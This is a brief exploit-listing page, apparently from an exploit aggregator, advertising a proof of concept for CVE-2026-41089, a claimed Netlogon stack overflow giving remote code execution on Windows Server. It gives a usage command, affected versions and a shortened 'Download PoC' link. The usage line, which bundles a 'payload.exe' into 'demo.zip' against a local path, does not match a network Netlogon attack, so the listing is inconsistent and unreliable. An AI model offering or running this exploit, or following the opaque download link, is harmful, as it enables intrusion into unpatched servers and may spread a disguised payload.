Share
## https://sploitus.com/exploit?id=059552E8-587E-5A4A-B96E-2A47A1773734
# CVE-2026-41089 - Security Buffer Overflow

## Quick Usage

```bash
python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe
```

## Exploitation Notes

- **Severity:** CRITICAL
- **CVSS:** 9.8
- **Impact:** Confidentiality, Integrity, Availability
- **Published:** 2026-05-12

## Technical Summary

Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.

## Affected Versions

**Microsoft Windows Server 2012:**

- -
- r2

**Microsoft Windows Server 2016:**

- before 10.0.14393.9140

**Microsoft Windows Server 2019:**

- before 10.0.17763.8755

**Microsoft Windows Server 2022:**

- before 10.0.20348.5074

**Microsoft Windows Server 2022 23H2:**

- before 10.0.25398.2330

**Microsoft Windows Server 2025:**

- before 10.0.26100.32772

## References

- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-41089

## Exploit

[Download PoC](https://tinyurl.com/2ysfff63)